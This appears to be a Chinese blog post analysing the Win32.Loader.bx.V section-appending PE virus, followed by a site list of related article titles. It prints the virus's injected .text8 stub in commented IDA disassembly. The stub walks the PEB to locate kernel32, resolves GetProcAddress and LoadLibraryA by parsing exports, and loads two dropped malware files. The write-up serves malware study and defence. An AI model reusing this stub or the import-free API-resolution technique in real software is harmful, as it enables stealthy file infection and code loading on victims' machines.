PE文件加节感染之Win32.Loader.bx.V病毒分析
一、病毒名称:Win32.Loader.bx.V
二、分析工具:IDA 5.5、OllyDebug、StudPE
三、PE文件加节感染病毒简介
PE病毒感染的方式比较多,也比较复杂也比较难分析,下面就针对PE文件感染之加节的方式进行汇编层次的深度分析,其实说来惭愧,第一接触这个病毒样本的时候也有
点手足无措,最后还是在别人的指导下才顺利的分析下来,开始分析该样本的时候,仅仅关注这个样本是木马病毒这个特点而忽略他的PE感染的特性。下面就该样本的传播方
式进行逐一分析,其实还蛮怀恋分析样本的那些时间。
四、对PE文件加节感染病毒的具体分析
对于被病毒感染的文件样本的分析,首先要查看被感染的样本文件的节的信息,截图如下:
因此对于该样本文件的分析,重点关注这个节:
跟进函数76F9601E 进行具体的分析:
回到了函数76F96000 中:
到这里.text8节的内容分析完毕,即将跳到.text节去执行。
对.text8节的代码的行为进行综述:
- 首先通过f:[0]寄存器定位TEB的基址;
- 在TEB的基址偏移30H处获取PEB结构的基址;
- 在PEB的基址偏移CH处获取PEB_LDR_DATA结构指针;
- 通过PEB_LDR_DATA结构指针在其偏移1CH处获取InInitializationOrderModuleList成员指针;
- 对DLL双链表的解析获取获取kernel32.dll的基地址;
- 对kernel32.dl这个PE文件进行解析,获取其导出表的相对虚拟地址;
- 对kernel32.dl的导出表进行解析,查找到函数GetProcAddress的调用地址;
- 调用函数GetProcAddress获取kernel32.dll中Loadlibrary函数的调用地址;
- 调用Loadlibrary函数加载文件"C:\\ProgramFiles\\Common Files\\System\\kb067201.nls"和文件"C:\\WINDOWS\\system32\\MSCOMCQS.tsk"到内存中。
.text8:76F96000 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
.text8:76F96000 public DllEntryPoint
.text8:76F96000 DllEntryPoint proc near
.text8:76F96000
.text8:76F96000 arg_4 = dword ptr 8
.text8:76F96000
.text8:76F96000 ; FUNCTION CHUNK AT .text8:76F9613C SIZE 00000011 BYTES
.text8:76F96000
.text8:76F96000 cmp [esp+arg_4], 1 ; 判断是否是 DLL_PROCESS_ATTACH
.text8:76F96005 jnz short loc_76F96014
.text8:76F96007 nop
.text8:76F96008 pusha ; 保存寄存器环境
.text8:76F96009 nop
.text8:76F9600A add edx, 0
.text8:76F9600D call sub_76F9601E ; 调用函数76F9601E
.text8:76F96012 nop ;
.text8:76F96012 ;
.text8:76F96012 ;
.text8:76F96012 ; 跳到地址76F96012的地方执行
.text8:76F96013 popa ; 恢复寄存器的环境
.text8:76F96014
.text8:76F96014 loc_76F96014: ; CODE XREF: DllEntryPoint+5j
.text8:76F96014 nop ; 调整堆栈
.text8:76F96015 add ebp, 0
.text8:76F96018 jmp loc_76F9613C ; 跳转到地址76F9613C的地方执行========; 调用函数76F9601E.text8:76F9601E sub_76F9601E proc near ; CODE XREF: DllEntryPoint+Dp
.text8:76F9601E
.text8:76F9601E var_28 = dword ptr -28h
.text8:76F9601E var_24 = dword ptr -24h
.text8:76F9601E var_20 = dword ptr -20h
.text8:76F9601E var_18 = byte ptr -18h
.text8:76F9601E var_17 = byte ptr -17h
.text8:76F9601E var_16 = word ptr -16h
.text8:76F9601E var_14 = dword ptr -14h
.text8:76F9601E dwGetProcAddress= dword ptr -0Ch
.text8:76F9601E var_8 = dword ptr -8
.text8:76F9601E hInstanseKernel32= dword ptr -4
.text8:76F9601E
.text8:76F9601E push ebp
.text8:76F9601F mov ebp, esp
.text8:76F96021 sub esp, 38h
.text8:76F96024 push ebx
.text8:76F96025 xor eax, eax
.text8:76F96027 push esi
.text8:76F96028 push edi ; ;保存寄存器的环境
.text8:76F96029 mov [ebp+var_28], 'PteG'
.text8:76F96030 mov [ebp+var_24], 'Acor'
.text8:76F96037 mov [ebp+var_20], 'erdd'
.text8:76F9603E mov dword ptr [ebp-1Ch], 'ss'
.text8:76F96045 mov [ebp+hInstanseKernel32], eax ; 初始化hInstanseKernel32 = 0
.text8:76F96048 mov [ebp+var_8], eax
.text8:76F9604B pusha ;
.text8:76F9604B ;
.text8:76F9604B ;
.text8:76F9604C mov eax, large fs:30h ; 获取PEB结构的基址
.text8:76F96052 mov edx, [eax+0Ch] ; 获取PEB_LDR_DATA结构指针
.text8:76F96055 mov eax, [edx+1Ch] ; 获取InInitializationOrderModuleList成员指针
.text8:76F96058 mov eax, [eax] ; 获取双向链表当前节点的后继指针
.text8:76F9605A mov eax, [eax+8] ; 获取kernel32.dll的基地址
.text8:76F9605D mov [ebp+hInstanseKernel32], eax ; 保存kernel32.dll的基地址到局部变量hInstanceKernal32
.text8:76F96060 mov edx, eax ; EDX保存Kernel32的基址
.text8:76F96062 add eax, 21h
.text8:76F96065 add eax, 1Bh ; EAX+3C定位到Kernel32.dll文件的Dos头的最后一个字段
.text8:76F96065 ; 获取DOS头到PE头的距离
.text8:76F96068 mov eax, [eax] ; 保存DOS头到PE头的距离到EAX中
.text8:76F9606A lea eax, [eax+edx+78h] ; 定位到Kernel32文件的数据目录表的RVA地址
.text8:76F9606E mov eax, [eax] ; 获取导出表的Export Directory的RVA保存在EAX中
.text8:76F96070 mov ecx, [edx+eax+18h] ; 定位到导出表,获取导出表的Number of entries in ENT保存在ECX中
.text8:76F96074 mov ebx, [edx+eax+20h] ; 定位到导出表,获取该导出表的RVA of ENT (export name table)函数名称的RVA
.text8:76F96074 ; 保存在EBX中
.text8:76F96078 add ebx, edx ; 定位到Kernel32的导出表中的函数ENT表的VA的地址
.text8:76F9607A
.text8:76F9607A loc_76F9607A: ; CODE XREF: sub_76F9601E+7Ej
.text8:76F9607A dec ecx ; 函数名称表ENT中的函数的个数-1
.text8:76F9607B nop
.text8:76F9607C test ecx, ecx ; 判断是该导出表的ENT中的函数名称的个数是否为0,
.text8:76F9607C ; 即该导出表的函数是否都已经比较完
.text8:76F9607E nop
.text8:76F9607F jz short loc_76F960BC ; 导出表的函数与GetProcAddress比较完了,直接跳转;
.text8:76F9607F ; 否则继续比较查找
.text8:76F9607F ;
.text8:76F96081 lea edi, [ebp+var_28] ; 将字符串GetProcAddress的指针给EDI
.text8:76F96087 mov esi, [ebx+ecx*4] ; 获取导出表中的第ECX个函数的名称RVA保存在ESI中
.text8:76F9608A add esi, edx ; 获取导出表中的第ECX个函数的名称的VA保存在ESI中
.text8:76F9608A ;
.text8:76F9608A ;
.text8:76F9608A ;
.text8:76F9608A ;
.text8:76F9608A ;
.text8:76F9608C push ecx
.text8:76F9608D mov ecx, 0Eh ; ECX=0E
.text8:76F96092 inc ecx ; ECX=ECX+1=0Fh比较的字节数
.text8:76F96093 nop
.text8:76F96094 repe cmpsb ; 将导出表中的ESI指向的函数的名称与字符串GetProcAddress进行比较,
.text8:76F96094 ; 并且比较前15个字节
.text8:76F96096 nop
.text8:76F96097 test ecx, ecx ; 判断字符串比较的是否是15个字节
.text8:76F96099 pop ecx ; ECX为该导出表的ENT中的函数名称的个数-1
.text8:76F9609A push edx
.text8:76F9609B pop edx ; EDX保存Kernel32的基址
.text8:76F9609C jnz short loc_76F9607A ; 判断以上的字符串比较是否找到函数GetProcAddress,
.text8:76F9609C ; 没有找到继续比较,找到了继续执行
.text8:76F9609C ; 最终的ECX为函数GetProcAddress在导出表的序号
.text8:76F9609E nop
.text8:76F9609F nop
.text8:76F960A0 mov esi, [edx+eax+24h] ; 定位到该导出表的AddressOfNameOrdinals的RVA
.text8:76F960A4 add esi, edx ; 定位到该导出表的AddressOfNameOrdinals的VA
.text8:76F960A6 mov edi, ecx ; ECX保存的是函数GetProcAddress的在函数序号表的序号
.text8:76F960A8 movzx esi, word ptr [esi+edi*2] ; 获取函数GetProcAddress的函数表中序号
.text8:76F960AC mov edi, [edx+eax+1Ch] ; 获取导出表的RVA of EAT (export address table)即函数地址表的RVA
.text8:76F960B0 add edi, edx ; 获取导出表的VA of EAT (export address table)即函数地址表的VA
.text8:76F960B2 mov edi, [edi+esi*4] ; 获取函数GetProcAddress的RVA地址
.text8:76F960B5 add edi, edx ; 获取函数GetProcAddress的调用地址
.text8:76F960B7 mov [ebp+dwGetProcAddress], edi ; dwGetProcAddress保存函数GetProcAddress的调用地址
.text8:76F960BA jmp short loc_76F960C3 ; 直接跳转到地址76F960C3的地方执行
.text8:76F960BC ; ---------------------------------------------------------------------------
.text8:76F960BC
.text8:76F960BC loc_76F960BC: ; CODE XREF: sub_76F9601E+61j
.text8:76F960BC mov [ebp+dwGetProcAddress], 0
.text8:76F960C3
.text8:76F960C3 loc_76F960C3: ; CODE XREF: sub_76F9601E+9Cj
.text8:76F960C3 popa
.text8:76F960C4 mov ecx, [ebp+hInstanseKernel32]
.text8:76F960C7 xor edi, edi ; EDI=0
.text8:76F960C9 cmp ecx, edi ; 判断hInstanseKernel32保存的基址是否为0
.text8:76F960CB jz short loc_76F96133 ; 为0失败跳转,否则继续执行
.text8:76F960CB ;
.text8:76F960CB ;
.text8:76F960CD mov eax, [ebp+dwGetProcAddress]
.text8:76F960D0 cmp eax, edi ; 判断dwGetProcAddress保存的函数的地址是否为0
.text8:76F960D2 jz short loc_76F96133 ; 为0失败跳转,否则成功继续执行
.text8:76F960D2 ;
.text8:76F960D2 ;
.text8:76F960D2 ;
.text8:76F960D4 lea esi, [ebp+var_20] ; 将字符串LoadLibrary的指针给esi
.text8:76F960D7 push esi ; 传入参数2-字符串LoadLibrary的指针
.text8:76F960D8 push ecx ; 传入参数1--hInstanseKernel32即Kernel32的基址
.text8:76F960D9 mov byte ptr [ebp+var_20], 'L'
.text8:76F960DD mov byte ptr [ebp+var_20+1], 'o'
.text8:76F960E1 mov byte ptr [ebp+var_20+2], 'a'
.text8:76F960E5 mov word ptr [ebp+var_20+3], 'Ld'
.text8:76F960EB nop
.text8:76F960EC nop
.text8:76F960ED mov word ptr [ebp-1Bh], 'bi'
.text8:76F960F3 nop
.text8:76F960F4 nop
.text8:76F960F5 mov byte ptr [ebp-19h], 'r'
.text8:76F960F9 mov [ebp+var_18], 'a'
.text8:76F960FD mov [ebp+var_17], 'r'
.text8:76F96101 mov [ebp+var_16], 'Ay'
.text8:76F96107 nop
.text8:76F96108 mov [ebp+var_14], edi ; var_14=0
.text8:76F9610B call eax ; 调用函数kernel32.GetProcAddress获取LoadLibrary函数的调用地址
.text8:76F9610B ;
.text8:76F9610D push esp
.text8:76F9610E pop esp
.text8:76F9610F cmp eax, edi ; 判断返回值即LoadLibrary的函数地址是否为0
.text8:76F96111 jz short loc_76F96133 ; 为0失败跳转,成功继续执行
.text8:76F96111 ;
.text8:76F96111 ;
.text8:76F96111 ;
.text8:76F96113 mov edi, eax ; EAX保存的是LoadLibrary函数的地址,赋值给EDI
.text8:76F96115 call sub_76F9611B ; 调用函数76F9611B
.text8:76F9611A nop
.text8:76F9611A sub_76F9601E endp ; sp-analysis failed
.text8:76F9611A
.text8:76F9611B
.text8:76F9611B ; =============== S U B R O U T I N E =======================================
.text8:76F9611B
.text8:76F9611B
.text8:76F9611B sub_76F9611B proc near ; CODE XREF: sub_76F9601E+F7p
.text8:76F9611B pop ebx ; EBX为hInstanseKernel32即Kernel32的基址
.text8:76F9611C lea esi, [ebx+4Ah]
.text8:76F9611F nop
.text8:76F96120
.text8:76F96120 loc_76F96120: ; CODE XREF: sub_76F9611B+16j
.text8:76F96120 mov cl, [esi] ; CL为LoadLibrary加载的文件的个数
.text8:76F96122 test cl, cl ; 判断cl是否为0
.text8:76F96124 jz short loc_76F96133 ; 为0直接跳转到地址76F96133,否则继续执行
.text8:76F96124 ;
.text8:76F96124 ;
.text8:76F96126 lea edx, [esi+6] ; LoadLibrary加载的文件的名称字符串
.text8:76F96129 push edx ; 传入参数1-LoadLibrary加载的文件的名称字符串
.text8:76F9612A call edi ; 调用函数kernel32.LoadLibraryA加载文件
.text8:76F9612C nop
.text8:76F9612D add esi, 6Ah ; ESI=ESI+6A
.text8:76F96130 nop
.text8:76F96131 jmp short loc_76F96120
.text8:76F96133 ; ---------------------------------------------------------------------------
.text8:76F96133
.text8:76F96133 loc_76F96133: ; CODE XREF: sub_76F9601E+ADj
.text8:76F96133 ; sub_76F9601E+B4j ...
.text8:76F96133 pop edi
.text8:76F96134 pop esi ; 函数的返回的处理
.text8:76F96135 nop
.text8:76F96136 pop ebx
.text8:76F96137 mov esp, ebp
.text8:76F96139 pop ebp
.text8:76F9613A nop
.text8:76F9613B retn ; 返回到 76F96012的地址执行 (Win32.76F96012)
PE文件加节感染之Win32.Loader.bx.V病毒分析相关推荐
- Net-Worm.Win32.Kido.ih蠕虫病毒分析+专杀工具源代码+手工清除全过程
Net-Worm.Win32.Kido.ih蠕虫病毒分析+专杀工具源代码+手工清除全过程 ...
- 检测PE文件加壳信息用的特征码
//定义特征码结构体 / typedef struct _Feature { public: LPCTSTR Pos; //相对于入口点的偏移 LPCTSTR Fea; //特征码 LPCTS ...
- win32下PE文件分析之节表
接上一篇的win32下PE文件分析之NT头 (一).FileBuffer与ImageBuffer (1).FileBuffer是将文件原原本本的读入申请的内存区域中,那部分区域就是FileBuffer ...
- PE文件感染和内存驻留
这次,作者将和大家一起讨论病毒的感染技术.另外,从本文开始,我们将陆续接触到一些病毒的高级编码技术.例如,内存驻留.EPO(入口点模糊)技术.加密技术.多态和变形等.通过这些高级技巧,你将进一步感受到 ...
- win32virus汇编PE文件感染代码阅读
win32virus汇编PE文件感染 预备: 选择好win32virus病毒和配置masm32环境(masm32环境搭建请参考:https://www.cnblogs.com/lsdb/p/74029 ...
- [系统安全] 四十一.APT系列(6)Python解析PE文件并获取时间戳判断来源区域
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
- PE文件病毒实验(二)——实验报告
实验目的:掌握PE文件格式:理解病毒感染PE文件的原理. 实验内容: (1) 了解PE文件格式. (2) 根据实验步骤,编程实现在PE文件中插入病毒代码.运行插入病毒代码后的PE文件. (3) 编程实 ...
- 图解PE文件实例研究
一 使用Win32汇编的PE信息查看小工具查看和研究PE文件 PE信息查看工具有多种.下面先使用在<Windows PE权威指南>中所附带的用Win32汇编编写的PE信息查看小工具来查看P ...
- Reverse-2 - PE文件
一.PE文件 wiki:可移植可执行文件(Portable Executable,缩写PE)是一种用于可执行文件,目标文件和动态链接库的文件格式.主要使用在32位和64位的Windows操作系统上,& ...
- 实验五——手工编写PE文件
[实验名称] 手工编写PE文件 [实验目的] 1.了解PE文件的概念.结构 2.熟悉PE编辑查看工具,详细了解PE文件格式 3.重点分析PE文件文件头.引入表.引出表,以及资源表 [实验原理] 1.P ...
最新文章
- 分享一个WM上绘制饼图、柱形图、折线图的控件类
- linux jsp 环境,Linux系统Jsp的环境:Apache,Tomcat配置
- cpuz北桥频率和内存频率_内存频率不是越高越好:寻找三代锐龙的最佳频率
- Spring Boot 开发web 项目
- 谷歌扇区图层制作工具_很实用!轻松实现Mapinfo和GoogleEarth图层的数据转换
- php 清空一个数组_php如何删除一个数组
- php中浮点数计算问题
- 编写一个Applet在屏幕上画一组同心圆
- Web前端的状态管理
- Security+ 学习笔记14 对称密码学
- 3. laravel 包含头尾文件
- python语法学习第一天--变量、运算符、数据类型
- C# dataGridView中的数据导出到excel
- spring源码解析——@Component注解原理
- 创建动态的XML数据
- 数据流程分析【停车场管理系统】
- 100923G-Por Costel and the Orchard
- 翻斗式雨量传感器VS压电式雨量传感器
- yarn : 无法加载文件 D:\Development\nvm\node_global\yarn.ps1,因为在此系统上禁止运行脚本。有关详细信息,请参阅 https:/go.microsoft.c
- JAVA大华摄像头抓拍与API接口集成
热门文章
- java基础编程题_Java基础练习题:编程练习(1) - 菜鸟头头
- 流落在北京的80后北漂们的未来在哪儿
- 【案例】Python金融分析-CAPM模型对股票进行分析
- 只有一个源视频的Deepfakes简介
- html css星号选择器,CSS里面的星号*
- qt中如何模拟按钮点击_qt模拟鼠标单击事件
- linux perl环境搭建,Perl 环境安装
- html5刮刮卡,canvas 实现刮刮卡
- 解决 chrome 访问 https 网站出现“您的连接不是私密的问题”
- 2021Java春招面试:看完这篇文终于搞明白了